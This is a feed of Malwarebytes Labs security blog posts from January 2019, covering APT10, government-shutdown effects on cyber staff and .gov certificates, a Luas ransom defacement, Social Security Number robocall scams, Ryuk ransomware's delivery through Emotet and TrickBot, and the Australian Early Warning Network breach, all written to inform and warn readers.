Note: PlugX and Poison Ivy were originally developed and deployed by Chinese state-sponsored actors. They have since been sold and resold to individual threat actors across multiple nations. At time of writing, it is inappropriate to attribute an attack to Chinese threat actors based on PlugX or Poison Ivy deployment alone.

Should you be worried?

That depends on the type of organization you run. APT10 has been observed to most commonly target construction, engineering, aerospace, and regional telecoms, as well as traditional government targets. If your company exists outside these verticals, it’s unlikely that APT10 would expend the time and resources to target you. For companies outside the targeting profile, it’s much more cost effective to spend defense budgets on common vulnerabilities that are most leveraged by common attackers.

What might they do next?

Like most APTs, APT10 has traditionally targeted at scale when attacking commercial enterprise. However, a more recent report by Price Waterhouse Cooper and BAE Systems suggests that they’ve begin devoting a portion of their operations to targeting Managed Service Providers (MSPs), most likely in an attempt to exfiltrate sensitive client data. Given that there’s been increasing awareness of advanced threats by high-value targets, continuing to target MSPs in this way is a plausible means of obtaining the same desired data at a lesser cost.

Further resources

If you’d like to do some additional reading on APTs, and specifically APT10, take a look at the following resources:

FireEye’s APT10 profile

Dark Reading article: China-based threat actor APT10 ramps up cyber espionage activity

PwC’s brief on Operation Cloud Hopper (APT10 campaign)

The post The Advanced Persistent Threat files: APT10 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How the government shutdown is influencing cybersecurity jobs

Malwarebytes - Tue, 01/15/2019 - 17:16

As of this writing, the government shutdown of 2019 is the longest ever in America. The only good news about this situation is that, with each passing day, a new group of people in the country seems to rediscover just how essential government services are, now that they’re unavailable.

The next likely casualty is the government’s stable of cybersecurity talent. Here’s why—and what it might mean for us in the long run.

How much government talent is furloughed?

Some of us might be surprised to learn the federal government has a workforce dedicated solely to cybersecurity. Many of these completely essential institutions and teams are now reduced to skeleton crews. This has the potential for long-lasting harm when it comes to the government’s ability to retain these specialists.

At time of writing, the Department of Homeland Security has furloughed 20 percent of its staff dedicated to “main cyber operations,” as well as administrative and supporting roles. But when you look at the entire cybersecurity apparatus of the federal government, the total potential loss of talent is far greater than the DHS alone. According to a planning document, 43 percent of the entire US cybersecurity workforce is currently furloughed.

Taking the top spot, however, is the National Institute of Standards and Technology, or NIST, with 85 percent of its staff furloughed.

This represents a danger today on a number of levels. But there’s a longer-lasting kind of harm, too, that few are talking about right now.

Will federal employees flock to the private sector?

Some of the more important staff and talent initiatives taken on during the Obama administration concerned the treatment, compensation, and benefits of federal employees and contractors. The goal was to make the public sector (the government) more competitive with the private sector. That’s how corporations retain talent, and it’s how the government can do so as well.

It’s no secret that job prospects for computer scientists, and cybersecurity specialists in particular, are rather cushy right now. Software developers enjoy a median income of more than $100,000 per year.

But now that the government is shut down, Washington, D.C. (and all of our state governments) will struggle even more not only to win talent over from the private sector, but keep it. With paychecks potentially off the table for a while, it’s becoming more likely that this already fragile situation will be pushed to the breaking point.

In an interview with the Washington Post, a former DHS cyber official named Greg Garcia explained the situation: “There’s unpredictability and uncertainty and instability [for DHS cyber employees],” he said. “Add on top of all that not getting paid, and I do not envy them.”

The problem here is one of morale. We have not been trying hard enough in recent years to maintain the government’s competitiveness with industry, and now we’re paying the price.

What does the future hold for cybersecurity talent at the federal level?

The bottom line with this government shutdown, just like with any other, is that sending your employees home without pay, and without a timetable for when their jobs and offices will be back up and running, is a bad way to do business.

What we’re likely to see is a “chilling effect” on the next generation or two of potential government employees. Holding these positions hostage in budget negotiations, positions for which applicants earned degrees and accreditation, is the equivalent of telling them the government isn’t an honorable employer and their talent isn’t valued—and that we don’t care if they take it elsewhere.

And there’s plenty of “elsewhere” for them out there, it turns out. In 2017, there were nearly 300,000 jobs available in the “cyber sciences.” That sounds like a lot of opportunities—but it will actually blossom into a full-blown talent shortage of 1.8 million jobs by 2022.

We don’t really want to be turning people off from this line of work—especially not when the stakes are so high. Moreover, it’s clear the government can’t afford to lose the talent it’s already brought together. There’s not going to be enough of it to go around before too long—and the priorities, arguably, should rest with national security.

Remembering the stakes

Barely a day goes by where we’re not reminded that, just as it has brought us closer together, Internet connectivity has also provided new tools for potential disruptive influences.

Reports are available now detailing the degree to which critical national infrastructure—such as our nuclear and other power plants, water treatment facilities, and electrical grids—are surprisingly vulnerable to domestic as well as foreign hacking attempts. This is a bright and wonderful age, but it’s clear that many of the systems we rely on for civilized living aren’t as safe as they’re supposed to be.

We should remember that even our voting machines are outdated and stand a good chance of being hacked or otherwise tampered with. But while public awareness of these issues has increased, furloughing and devaluing cyber talent at the federal and state levels is not a good way to drum up attention and support for such important issues.

Are there any foreseeable solutions to this problem?

The first solution involves remembering that the US Defense Department, even before the government was shut down, was already losing some 4,000 employees to the private sector every year, a sign that our government was already a dissatisfactory place to work. In point of fact, “dissatisfied” or “very dissatisfied” was how 20 percent of DHS employees described their jobs in a survey that made the rounds in 2018.

Even some of the most critical resources on the Internet have been taken offline by this shutdown. NIST maintains catalogs of government cybersecurity standards that are essential for maintaining webpage uptime and HTTPS certificates. With 85 percent of their staff sitting at home, security certificates will expire and websites will be taken down.

When resources like these are unavailable, the Internet becomes a manifestly less safe place to spend time. And that’s the last thing we want.

The post How the government shutdown is influencing cybersecurity jobs appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 7 – 13)

Malwarebytes - Mon, 01/14/2019 - 16:45

Last week on the Malwarebytes Labs blog, we took a look at the Ryuk ransomware attack causing trouble over the holidays, as well as a ransom threat for an Irish transportation company. We explored the realm of SSN scams, and looked at what happens when an early warning system is attacked.

Other cybersecurity news
  • Password reuse problems. Multiple Reddit accounts reported being locked out after site admins blamed “password reuse” for the issue. (Source: The Register)
  • 85 rogue apps pulled from Play Store. Sadly, not before some 9 million downloads had already taken place. (Source: Trend Micro)
  • Home router risk. It seems many home routers aren’t doing enough in the fight against hackers. (Source: Help Net Security)
  • Deletion not allowed. Some people aren’t happy they can’t remove Facebook from their Samsung phones. (Source: Bloomberg)
  • Takedown: How a system admin brought down the notorious “El Chapo.” (Source: USA Today)
  • 2FA under fire. A new pentest tool called Mantis can be used to assist in the phishing of OTP (one time password) codes. (Source: Naked Security) 
  • Facebook falls foul of new security laws in Vietnam. New rules have brought a spot of bother for Facebook, accused of not removing certain types of content and handing over data related to “fraudulent accounts.” (source: Vietnam News)
  • Trading site has leak issue. A user on the newly set up trading platform was able to grab a lot of potentially problematic snippets, including authentication tokens and password reset links. (source: Ars Technica)
  • Local risk to card details. A researcher discovered payment info was being stored locally on machines, potentially exposing them to anyone with physical access. (Source: Hacker One) 
  • Facebook exec swatted. The dangerous “gag” of sending armed law enforcement to an address ends up causing problems for a “cybersecurity executive,” after bogus calls claimed they had “pipe bombs all over the place.” (source: PA Daily post)

Stay safe, everyone!

The post A week in security (January 7 – 13) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Government shutdown impacts .gov websites, puts Americans in danger

Malwarebytes - Mon, 01/14/2019 - 16:00

If you are in the United States, then you likely already know that we are on our 24th day of a government shutdown. While it is considered a “partial” shutdown, there are still plenty of government workers who are furloughed, which impacts the services they run—both online and off.

Last week, TechCrunch posted a concerning story about the shutdown, which covered the findings of NetCraft, a UK Internet service company, who discovered that numerous US government websites are now inaccessible due to expired security certificates.

This is a quick post to explain what happened, and more importantly, how cybercriminals will use this situation to their advantage.

Security certificates

We aren’t going to dig deep into how security certificates work for websites, but the gist is that every vendor or organization that uses a website requires a security certificate for users to access their site with trust. Today, a few browsers, like Chrome, require these certificates before they even let users access the websites. You can recognize when a website uses a valid security certificate, usually indicated by a green lock on the URL bar.

The certificate confirms that the identity of the website that you are communicating with is legitimate. In addition, these certificates make it possible for users to establish a secure connection with the web server hosting the site, which is incredibly important when sending financial or personal information over the Internet.

Since some of the most popular browsers won’t even let users visit a website if it doesn’t have a valid certificate, we now have a lot of users who can’t access government websites because the certificates have expired.

Why did they expire?

If a security certificate lasted forever, what would be the assurance that it hasn’t been stolen by criminals who could then use it on their own malicious websites? Because of this, the organization that owns the website must purchase and deploy a new certificate each year. Think of it as a yearly registration fee, not unlike renewing your car tags.

The reason these certificates were allowed to lapse is because no one’s at work renewing them. Apparently, most US government websites maintain their own certificates. This is why not all US .gov websites are down—just a few of them (at least for now). With the partial shutdown, the people in charge of making sure citizens can access their websites by keeping these certificates up-to-date are unable to do their jobs, which eventually leads to users being unable to access these sites at all.

What’s the problem?

Obviously, not being able to access some government websites is a pain, but is it dangerous? The answer is: yes, because you can bet that cybercriminals are going to take advantage of the situation.

That is why we want to share some vital warnings about how this shutdown may help cybercriminals. Please, share this with everyone you know, at least until the shutdown is over.

Cybercriminals frequently use real-world events to trick users into clicking on a link or opening an attachment. You can look back at a couple of instances where events in Syria directly influenced the actions of cybercriminals, be it state sponsored or otherwise. In another case, the Boston bombing was used to try and scam people. From terrorist attacks to natural disasters, threat actors jump on the chance to exploit episodes of fear and uncertainty.

Fake YouTube page set up to infect Syrian rebels

You can expect that users who are looking for government websites, especially if they offer a service or require personal information or a login to access, are going to find copies of these sites presented as an alternative to access the same website.

Fake Singapore government website. Photo credit: Gov.SG

Users who rely on social services—typically older folks, veterans, or the disabled—will be looking for a way to access the government sites they frequent. When they search for the site, their first link might take them to a dead end, since the security certificate has expired. However, the second or third link might work and take the user to a page that looks exactly like where they want to go.

Classic phishing attack.

What to do about it

The best thing to do right now is share this information with those closest to you so they don’t make a mistake and give away valuable personal info just because the government has issues keeping itself open. Also, be vigilant moving forward, not just in this case but anytime there is sensational news. Don’t just accept what the Internet tells you. Investigate. Think twice. And please, please, when in doubt, do not submit your personal information online.

The bad guys know human behavior, and they know that people can’t help clicking on links that are either convenient or scandalous and sensational. Prove them wrong.

Stay safe out there!

The post Government shutdown impacts .gov websites, puts Americans in danger appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Luas data ransom: the hacker who cried wolf?

Malwarebytes - Fri, 01/11/2019 - 18:00

In a terrible start to the year for Irish tram firm Luas, their site was compromised a week ago and adorned with a stark ransom warning:

Click to enlarge

You are hacked. Some time ago I wrote that you have serious security holes.

You didn’t reply.

The next time someone talks to you, press the reply button.

You must pay one bitcoin in five days. Otherwise I will publish all data and send emails to your users.

The message came with a Bitcoin address, and the defacement was quickly taken down.

Real threat or a blast of bluster?

Many observers questioned the legitimacy of this ransom threat. One Bitcoin is currently around 3,100 Euros. Luas aren’t exactly short of cash, so it wouldn’t be an issue for them to pay (not that we’d advise it). The general feeling was that either 3,100 Euros was a large sum of money to the attacker, or they just wanted the company to address the problem facing them without fuss.

As soon as the hack was announced, nervous customers wondered exactly what might be dumped into the ether should the ransom go unpaid. Names and addresses? Emails? Perhaps even payment data? However, this is where the hacker’s version of events starts to unravel. I’m not personally familiar with the website in question, and it’s currently still down, so I looked on Internet Archive.

A trip down memory lane

The site doesn’t appear to have any form of registration or login; it seems to be more of an information portal. Additionally, the one section that references payment—“Pay your standard fare notice”—leads to the payments site, which Luas pointed out hadn’t been compromised. The site read as follows:

The Luas website is undergoing restoration following a cyber-attack.

We wish to advise customers that the Tax Saver and Standard Fare Notice sites have NOT been compromised.

It’s worth noting the payments section hasn’t been taken offline, either.

The hacker who cried wolf?

We waited with baited breath as the ransom timer ticked down. Would we see a large blast of customer data popping up online? Or would the whole thing fall flat? If essential information such as logins and payment data hadn’t been grabbed, what exactly were we talking about here? Basic website metrics such as visitor stats or website referrers? What could this attacker possibly have grabbed while achieving what appears to have been a perfectly standard webpage defacement in all other respects?

The answer is, of course, “Nobody knows.”

The deadline has come, gone, and is now on vacation somewhere. Occasionally, it lets you know the weather is lovely and reminds you to put the bins out.

Absolutely none of which helps anybody who suspects they may have been caught up in this. Even more slightly surreal is the fact Luas said they’d contact anyone they thought may be affected, but there’s zero example of said contact on social media that I can find.

Customers: An update on the Luas cyberattack.

Luas technicians are still investigating it and are working to restore the site.

Luas has contacted the Commissioner for Data Protection and we have in accordance with best practice contacted everyone whose information may have been compromised.

This is absolutely not what normally happens, and at this point I’d usually be linking to a deluge of “you got me” posts. That’s the theory. The reality, currently, is nothing but a wave of silence.

This number is no longer available

Our suspicion here is that nothing customer related was taken and it was all a ransom-themed bluff to either grab some Bitcoin cash or attention, or perhaps both. If you’ve used any Luas site for any type of registration or payment, you’re probably fine.

Unless the site compromiser had a sudden change of heart, they were going to dump the data in public fashion instead of some hidden underground forum, but it hasn’t happened. People may call them “underground,” but the reality is data dumps don’t remain private for long.

No further updates are forthcoming from Luas, so it doesn’t appear they’ve been told their number is up either. All in all, we’d say cross some fingers and hope everything is coming up Milhouse.

While I try to remember if things coming up Milhouse is good or bad, here’s what you can do if you’re still worried you may be affected.

Data dump fallout tips

This isn’t just good advice for the Luas attack, but for any potential breach situation.

If you’re on Twitter, simply follow haveibeenpwned, a service maintained by security pro Troy Hunt. It will usually be one of the first places you’ll hear about any breach where data has been taken. After that, head over to the haveibeenpwned website and check if your emails have been included in any attacks. If they have, you’ll see a short summary of when it happened and what was taken. Note that you won’t see the stolen data.

Finally, you can register for alerts when any new breaches are added.

There’s really no need to go spelunking into the murky pools of hacker forums, looking in vain for a breach you may be on. Rest assured that if it’s happened, you’ll find out eventually—one way or another. At that point, it’s a case of changing your logins and applying whatever security steps are required to fix things up. Ransoms are always a major issue, whether from threats or infection files. If this story has any additional developments, we will of course update this post as to what anyone affected should do next.

The post Luas data ransom: the hacker who cried wolf? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Social Security Number scammers are at it again

Malwarebytes - Thu, 01/10/2019 - 21:05

The Federal Trade Commission (FTC) once again sounded the alarm in mid-December about the latest Social Security Number (SSN) scam that continues to affect thousands of Americans.

While most of us were only able to read about this type of scam in the past, the FTC now has an audio recording of an SSN scam robocall, which they released two weeks after the warning.

Play the audio below and familiarize yourselves with what an SSN scam sounds like. Take note of the sentence phrasing and the mild threat at the near end of the automated recording directed to those who aren’t motivated enough to call back the number it provided.


law enforcement agencies to suspend your Social Security number on an immediate basis, as we have received suspicious trails of information in your name. The moment you receive this message, I need you to get back to me on my department division toll-free number that is 1-888-952-5554. I repeat 1-888-952-5554. Verify the last four digits of your Social Security number when you call to better assist you with this issue. Now, if I don’t hear a call from you, we will have to issue an arrest warrant under your name and get you arrested. So, get back to me as soon as possible. Thank you.

This particular recording wasn’t specific about the “suspicious trails of information” they were referring to, but there have been reports to the FTC of scammers linking their target’s SSN to certain crimes they claim are taking place in Texas, such as illegally sending money outside of the country.

The FTC noted that the threat of individuals or groups pretending to be from the Social Security Administration (SSA) are growing at an exponential rate. In fact, there was a 994 percent increase in SSN scams reported to FTC—from 3,200 in 2017 to 35,000 in 2018.

Not just a numb3rs g4m3

One attribute that makes SSN scams successful (and makes one likely to be more accepting of calls) is the scammers’ use of technology to mimic the legitimate contact number of the Social Security Administration (SSA) so that appears in the caller ID when contacting targets. In this case, the scammers used 1-800-772-1213, the SSA’s national customer service number. Yet, SSN scams are more than just a numbers game.

Seeing red

To help clue you in on other tactics used by SSN scammers, below is a list of red flags or tactics these scammers practice that anyone with a Social Security Number should at least be familiar with:

  • The call comes out of nowhere—especially if you haven’t contacted the SSA first or you have no ongoing business with them, such as a pending Social Security Disability (SSD) application. If you do have a pending application with the SSA, an agent may call if the information in the application isn’t complete, answers on the form aren’t legible, or the agent has found some discrepancies between the information you provided in the application and the information they got from other Federal agencies. An SSA agent will only ask for your SSN if the one you provided is invalid or incorrect.
  • The purported SSA agent makes untruthful or worrying requests or claims, such as:
    • Your SSN is suspended because of crime-related links (such as what the robocaller claims in the recording above). Fact: Social Security numbers do not get suspended.
    • You need to “reactivate” your suspended SSN. Then, scammers either ask for more information or a fee to do this.
    • You need to pay for something immediately, like a debt (and they won’t allow you to appeal the amount you owe).
    • You need to send over your payment via a means they specify, such as the agent requiring you to pay using your prepaid debit card.
    • You need to provide a bank routing number or card details over the phone.
    • Your SSN is linked to malicious activities that will lead to your arrest or deportation.
    • The SSA system is down, so you need to provide the purported agent with your personal information, such as SSN, date of birth, mother’s maiden name, and bank information.

“SSA employees do contact citizens by telephone for customer-service purposes, and in some situations, an SSA employee may request the citizen confirm personal information over the phone,” writes Andrew Cannarsa, communications director for the Office of the Inspector General (OIG). “However, SSA employees will never threaten you for information or promise a Social Security benefit approval or increase in exchange for information. In those cases, the call is fraudulent.”

Just hang up

Hanging up is the best course of action when you deliberately or accidentally answered a call that you realized, at some point, appears scammy. When in doubt, assume it’s a scam. Besides, no one, not even the legitimate SSA, will penalize you for hanging up on them. Remember that when it comes to nipping scams in the bud, you are in control. End it before they can say another word.

Prevention, of course, is still key. Being able to catch the known red flags we have identified above and knowing what to do should you see a legitimate SSA number flash in the caller ID screen—whether you do or don’t have outstanding business with them—can minimize the risk.

Is the SSA calling? Don’t pick up the phone. Instead, call SSA via their consumer service number and ask if they have been trying to reach you.

Other scams related to SSN

Unfortunately, children and the deceased aren’t safe from fraudsters and identity thieves, either. Parents, make sure you find the time to check your kids’ credit scores to make sure that they remains untouched and are not being built up by someone else. If you see something’s wrong, or if you see signs of potential identity theft, go to this FTC page to read more.

Relatives of deceased loved ones should do credit checks every now and then as well. The Identity Theft Resource Center has useful material on how one can protect the deceased’s identity and other tips.

When it comes to scams, the following is always true: Does it seems suspicious or “off” in any way? If so, it probably is. Proceed with caution and guard your Social Security Number well.

The post Social Security Number scammers are at it again appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Ryuk ransomware attacks businesses over the holidays

Malwarebytes - Tue, 01/08/2019 - 19:49

While families gathered for food and merriment on Christmas Eve, most businesses slumbered. Nothing was stirring, not even a mouse—or so they thought.

For those at Tribune Publishing and Data Resolution, however, a silent attack was slowly spreading through their networks, encrypting data and halting operations. And this attack was from a fairly new ransomware family called Ryuk.

Ryuk, which made its debut in August 2018, is different from many other ransomware families we’ve analyzed, not because of its capabilities, but because of the novel way it infects systems.

So let’s take a look at this elusive new threat. What is Ryuk? What makes it different from other ransomware attacks? And how can businesses stop it and similar threats in the future?

What is Ryuk?

Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts.

Despite a successful infection run, Ryuk itself possesses functionality that you would see in a few other modern ransomware families. This includes the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By doing this, the attackers could disable the Windows System Restore option for users, and therefore make it impossible to recover from the attack without external backups.

Ryuk “polite” ransom note

One interesting aspect of this ransomware is that it drops more than one note on the system. The second note is written in a polite tone, similar to notes dropped by BitPaymer ransomware, which adds to the mystery.

Ryuk “not-so-polite” ransom note

Similarities with Hermes

Researchers at Checkpoint have already conducted deep analysis of this threat, and one of their findings was that Ryuk shares many similarities with another ransomware family: Hermes.

Inside of both Ryuk and Hermes, there are numerous instances of similar or identical code segments. In addition, several strings within Ryuk have been discovered that refer to Hermes—in two separate cases.

When launched, Ryuk will first look for the Hermes marker that is inserted into each encrypted file. This is a means to identify if the file or system has already been attacked and/or encrypted.

The other case involves whitelisted folders, and while not as damning as the first, the fact that both ransomware families whitelist certain folder names is another clue that the two families might share originators. For example, both Ryuk and Hermes whitelist a folder named “Ahnlab”, which is the name of a popular South Korean security software.

If you know your malware, you might remember that Hermes was attributed to the Lazarus group, who are associated with suspected North Korean nation-state operations. This has led many analysts and journalists to speculate that North Korea was behind this attack.

We’re not so sure about that.

Notable attacks

Multiple notable Ryuk attacks have occurred over the last few months primarily in the United States, in which the ransomware infected large numbers of endpoints and demanded higher ransoms than what we typically see (15 to 50 Bitcoins).

One such attack was on the Onslow Water and Sewer Authority (OWASA) on October 15, 2018, which kept the organization from being able to use their computers for a time. While water and sewage services, as well as customer data, were untouched by the ransomware attack, it still caused significant damage to the organization’s network and resulted in numerous databases and systems being rebuilt from the ground up.

Infection method

According to Checkpoint and multiple other analysts and researchers, Ryuk is spread as a secondary payload through botnets, such as TrickBot and Emotet.

Here is the running theory: Emotet makes the initial infection on the endpoint. It has its own abilities to spread laterally throughout the network, as well as launch its own malspam campaign from the infected endpoint, sending additional malware to other users on the same or different networks.

From there, the most common payload that we have seen Emotet drop over the last six months has been TrickBot. This malware has the capability to steal credentials, and also to move around the network laterally and spread in other ways.

Both TrickBot and Emotet have been used as information stealers, downloaders, and even worms based on their most recent functionality.

At some point, for reasons we will explore later in this post, TrickBot will download and drop Ryuk ransomware on the system, assuming that the infected network is something that the attackers want to ransom. Since we don’t see even a fraction of the number of Ryuk detections as we see of Emotet and TrickBot through our product telemetry, we can assume that it’s not the default standard operation to infect systems with Ryuk after a time, but rather something that is triggered by a human attacker behind the scenes.


Let’s take a look at the stats for Emotet, Ryuk, and TrickBot from August until present-day and see if we can’t identify a trend.

Malwarebytes’ detections from August 1, 2018 – January 2, 2019

The blue line represents Emotet, 2018’s biggest information-stealing Trojan. While this chart only shows us August onward, rest assured that for much of the year, Emotet was on the map. However, as we sailed into Q4 2018, it became a much bigger problem.

The orange line represents TrickBot. These detections are expected to be lower than Emotet, since Emotet is usually the primary payload. This means that in order for TrickBot to be detected, it must have either been delivered directly to an endpoint or dropped by an Emotet infection that was undetected by security software or deployed on a system without it. In addition, TrickBot hasn’t been the default payload for Emotet for the entire year, as the Trojan has continuously swapped payloads, depending on time of year and opportunity.

Based on this, to get hit with Ryuk (at least until we figure out the real intention here) you would need to have either disabled, not installed, or not updated your security software. You would need to refrain from conducting regular scans to identify TrickBot or Emotet. You would need to either have unpatched endpoints or weak credentials for TrickBot and Emotet to move laterally throughout the network and then, finally, you would need to be a target.

That being said, while our detections of Ryuk are small compared to the other families on this chart, that’s likely because we caught the infection during an earlier stage of the attack, and the circumstances for a Ryuk attack need to be just right—like Goldilocks’ porridge. Surprisingly enough, organizations have created the perfect environment for these threats to thrive. This may also be the reason behind the huge ransom payment, as fewer infections lead to fewer payouts.

Christmas campaign

While active earlier in the year, Ryuk didn’t make as many headlines as when it launched its “holiday campaign,” or rather the two largest sets of Ryuk infections, which happened around Christmastime.

The chart below shows our detection stats for Ryuk from the beginning of December until now, with the two infection spikes noted with stars.

Malwarebytes’ Ryuk detections December 5, 2018 – January 2, 2019

These spikes show that significant attacks occurred on December 24 and December 27.

Data Resolution attack

The first attack was on, a Cloud hosting provider, on Christmas Eve. As you can see from above, it was the most Ryuk we had detected in a single day over the last month.

According to Data Resolution, Ryuk was able to infect systems by using a compromised login account. From there, the malware gave control of the organization’s data center domain to the attackers until the whole network was shut down by Data Resolution.

The company assures customers that no user data was compromised, and the intent of the attack was to hijack, not steal. Although, knowing how this malware finds its way onto an endpoint in the first place is a good sign that they’ve probably lost at least some information.

Tribune Publishing attack

Our second star represents the December 27 attack, when multiple newsprint organizations under the Tribute Publishing umbrella (now or in the recent past) were hit with Ryuk ransomware, essentially disabling these organizations’ ability to print their own papers.

The attack was discovered late Thursday night, when one of the editors at the San Diego Union-Tribune was unable to send finished pages to the printing press. These issues have since been resolved.


We believe Ryuk is infecting systems using Emotet and TrickBot to distribute the ransomware. However, what’s unclear is why criminals would use this ransomware after an already-successful infection.

In this case, we can actually take a page from the Hermes playbook. We witnessed Hermes being used in Taiwan as a means to cover the tracks of another malware family already on the network. Is Ryuk being used in the same way?

Since Emotet and TrickBot are not state-sponsored malware, and they are usually automatically launched to a blanket of would-be victims (rather than identifying a target and being launched manually), it seems odd that Ryuk would be used in only a few cases to hide the infection. So perhaps we can rule this theory out.

A second, more probable theory is that the purpose of Ryuk is as a last ditch effort to extort more value from an already-juicy target.

Let’s say that the attackers behind Emotet and TrickBot have their bots map out networks to to identify a target organization. If the target has a large enough infection spread of Emotet/TrickBot, and/or if its operations are critical or valuable enough that disruption would trigger an inclination to pay the ransom, then that might make them the perfect target for a Ryuk infection.

The true intention for using this malware can only be speculated at this point. However, whether it’s hiding the tracks of other malware or simply looking for ways to make more cash after stealing all the relevant data they could, businesses should be wary of writing this one off.

The fact remains that there are thousands of active Emotet and TrickBot infections all over the world right now. Any of the organizations that are dealing with these threats need to take them seriously, because an information stealer might turn into nasty ransomware at any time. This is the truth of our modern threat landscape.


As mentioned earlier, many analysts and journalists have decided that North Korea is the most likely attacker to be distributing Ryuk. While we can’t completely rule this out, we aren’t entirely sure it’s accurate.

Ryuk does match Hermes in many ways. Based on the strings found, it was likely built on top of, or is a modified version of Hermes. How the attackers got the source code is unknown, however, we have observed instances where criminals were selling versions of Hermes on hacker forums.

This introduces another potential reason the source code got into the hands of a different actor.

Identifying the attribution of this attack based on similarities between two families, one of which is associated with a known nation-state attack group (Lazarus) is a logical fallacy, as described by Robert M. Lee in a recent article, “Attribution is not Transitive – Tribute Publishing Cyber Attack as a Case Study.” The article takes a deeper dive into the errors of attribution based on flimsy evidence. We caution readers, journalists, and other analysts on drawing conclusions from correlations.


Now that we know how and potentially why Ryuk attacks businesses, how can we protect against this malware and others like it?

Let’s focus on specific technologies and operations that are proven effective against this threat.

Anti-exploit technology

The use of exploits for both infection and lateral movement has been increasing for years. The primary method of infection for Emotet at the moment is through spam with attached Office documents loaded with malicious scripts.

These malicious scripts are macros that, once the user clicks on “Enable content” (usually through some kind of social engineering trick), will launch additional scripts to cause havoc. We most commonly see scripts for JavaScript and PowerShell, with PowerShell quickly becoming the de-facto scripting language for infecting users.

While you can stop these threats by training users to recognize social engineering attempts or use an email protection platform that recognizes malicious spam, using anti-exploit technology can also block those malicious scripts from trying to install malware on the system.

In addition, using protection technologies, such as anti-ransomware add immense amounts of protection against ransomware infections, stopping them before they can do serious damage.

Regular, updated malware scans

This is a general rule that has been ignored enough times to be worth mentioning here. In order to have effective security solutions, they need to be used and updated frequently so they can recognize and block the latest threats.

In one case, the IT team of an organization didn’t even know they were lousy with Emotet infections until they had updated their security software. They had false confidence in a security solution that wasn’t fully armed with the tools to stop the threats. And because of that, they had a serious problem on their hands.


Network segmentation

This is a tactic that we have been recommending for years, especially when it comes to protecting against ransomware. To ensure that you don’t lose your mapped or networked drives and resources if a single endpoint gets infected, it’s a good idea to segment access to certain servers and files.

There are two ways to segment your network and reduce the damage from a ransomware attack. First, restrict access to certain mapped drives based on role requirements. Second, use a separate or third-party system for storing shared files and folders, such as Box or Dropbox.

Evolving threats

This last year has brought with it some novel approaches to causing disruption and devastation in the workplace. While ransomware was the deadliest malware for businesses in 2017, 2018 and beyond look to bring us multiple malware deployed in a single attack chain.

What’s more, families like Emotet and TrickBot continue to evolve their tactics, techniques, and capabilities, making them more dangerous with each new generation. While today, we might be worried about Emotet dropping Ryuk, tomorrow Emotet could simply act as ransomware itself. It’s up to businesses and security professionals to stay on top of emerging threats, however minor they may appear, as they often signal a change in the shape of things to come.

Thanks for reading and safe surfing!

The post Ryuk ransomware attacks businesses over the holidays appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Australia’s Early Warning Network compromised

Malwarebytes - Mon, 01/07/2019 - 17:59

An early warning network designed to notify subscribers about dangerous weather in Australia has been compromised. The hacker sent many bogus messages via phone, SMS, and email, telling users that the service had been hacked.

Early Warning Network, a service used by local governments to send notifications about weather hazards, found itself firing these rogue missives into the void late on Saturday evening. They haven’t revealed how many people received a message, but they caught the attack quickly and shut it down.

A warning from Early Warning Network

The website says:

At around 930pm EDT 5th January, the EWN Alerting system was illegally accessed with a nuisance message sent to a part of EWNs database. This was sent out via email, text message and landline. EWN staff at the time were able to quickly identify the attack and shut off the system limiting the number of messages sent out. Unfortunately, a small proportion of our database received this alert

The text sent to subscribers read as follows:

EWN has been hacked. Your personal data is not safe. Trying to fix the security issues. Email [address] if you wish to unsubscribe.

If you were on the receiving end of the email version, you would have found it to be identical:

Click to enlarge

Some people in EWN’s comments sections reported receiving phone calls simply stating “You have been hacked,” which would be a little alarming, to say the least. An Early Warning Network shouldn’t come with a warning, but this is where we’re at.

How did they do it?

The alert service has so far confirmed that the attack took place from inside Australia, and the rogue message was the result of login credentials obtained without permission. There’s no other information available at time of writing, but it does seem likely that this was a targeted spear phish.

EWN have also stated that user information wasn’t at risk:

The unauthorized alert sent on Saturday night was undertaken by an unauthorized person using illicitly gained credentials to login and post a nuisance spam-notification to some of our customers. The link used in this alert were non-harmful and your personal information was not compromised in this event. Investigations are continuing with the Police and Australian Cyber Security Centre involved

This directly contradicts the hacker’s claim that “your personal data is not safe.” It is also claimed that the links in the emails and SMS messages were not harmful.

What was the point?

Given the flat denial of user data being put at risk, it seems this is more about reputation damage. Perhaps someone has a weirdly specific grudge against a lifesaving service, or maybe it’s just a trollish prank done for cheap laughs. Either way, it’s an incredibly careless thing to do.

In the Phlippines, PHIVOLCS warn about seismic activity and volcano eruptions, while PAGASA deal with weather systems, typically via media alerts and social media. These are high-end setups, almost always government run. In the US, a variety of warnings are available under wireless emergency alerts, which can include everything from weather safety to AMBER alerts. Early warning systems can save thousands—as was evident by the lack of systems in place to warn tourists and locals about the Boxing Day tsunami in 2004, which claimed more than 200,000 lives.

That’s why alert system tampering is always a bad idea. If people unsubscribe as a result of this attack, they could potentially put their lives in danger. EWN is not a huge organisation, and this attack on their systems and reputation could have a huge impact. It’s no wonder police are quick to investigate the attack taking place on this particular network.

What can the affected organisation do now?

Given there’s no further information as to how credentials were obtained, we can only offer an educated guess. If our hunch from earlier is correct, and it is a targeted phish, then some staff training may be needed. Additionally, they shouldn’t be relying on “just” a password to keep things safe.

Even the longest password around is a chocolate fireguard if someone manages to swipe it. That’s where two-factor authentication (2FA) comes into play. If more than one person has to share a single login, there’s a number of ways to get around that, too. Some password managers let groups share logins without revealing the password. If you haven’t thought about beefing up password security, now is as good a time as ever.

Lasting ramifications

Most people have seen an article about hacked road signs at some point, and probably suppressed the odd giggle or two. There are good arguments for not doing that; there are great arguments for not messing with emergency alert systems.

It remains to be seen if the person responsible for this will be caught. This is definitely not a great situation for anyone reliant on the integrity of these networks in bad weather regions. Will anyone even believe the next message sent out? And how much trouble will the person who did this be in, should fatalities occur? Our feeling is, a slap on the wrist is not enough.

The post Australia’s Early Warning Network compromised appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 31, 2018 – January 6, 2019)

